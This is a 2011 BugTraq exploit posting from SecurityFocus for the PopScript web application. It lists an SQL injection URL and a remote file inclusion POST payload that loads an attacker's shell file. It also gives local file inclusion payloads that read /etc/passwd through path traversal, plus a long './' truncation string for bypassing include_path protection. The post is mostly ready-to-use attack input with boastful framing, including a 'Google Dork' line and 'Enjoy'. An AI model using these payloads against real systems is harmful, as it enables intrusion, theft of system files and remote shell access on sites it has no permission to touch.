BugTraq
PopScript Multiple Vulnerabilities Jun 05 2011 01:22PM
root d99y com
##########################################################
# Exploit Title: PopScript Multiple Vulnerabilities
# home : http://www.D99Y.com
# Google Dork: Do as you would be done by ; )
# Date: 5/6/2011
# Author: NassRawI
# Software Link: http://www.popscript.com/
##########################################################
#
# [1] SQL injection
#
# http://localhost/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
#
# [2] File inclusion = require()
#
# Remote File inclusion :
#
# exploit :
#
# send in index.php [ post ]
#
# email=root (at) d99y (dot) com [email concealed]&mode=[Shell txt]?&password=nassrawi&remember=ON
#
# Local :
#
# exploit :
#
# send in index.php [ post ]
#
# email=root (at) d99y (dot) com [email concealed]&mode=nassrawi../../../../../../etc/passwd&password=n
assrawi
#
# You can skip protection include_path ; )
#
# email=root (at) d99y (dot) com [email concealed]&mode=nassrawi../../../../../../etc/passwd/./././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././.!
/./././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././
././././././././././././././././././././././././././././././!
././././
./././././.&password=nassrawi
#
#
##########################################################

Greetz :

D99Y Team and all members D99Y.CoM

Enjoy ; )

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus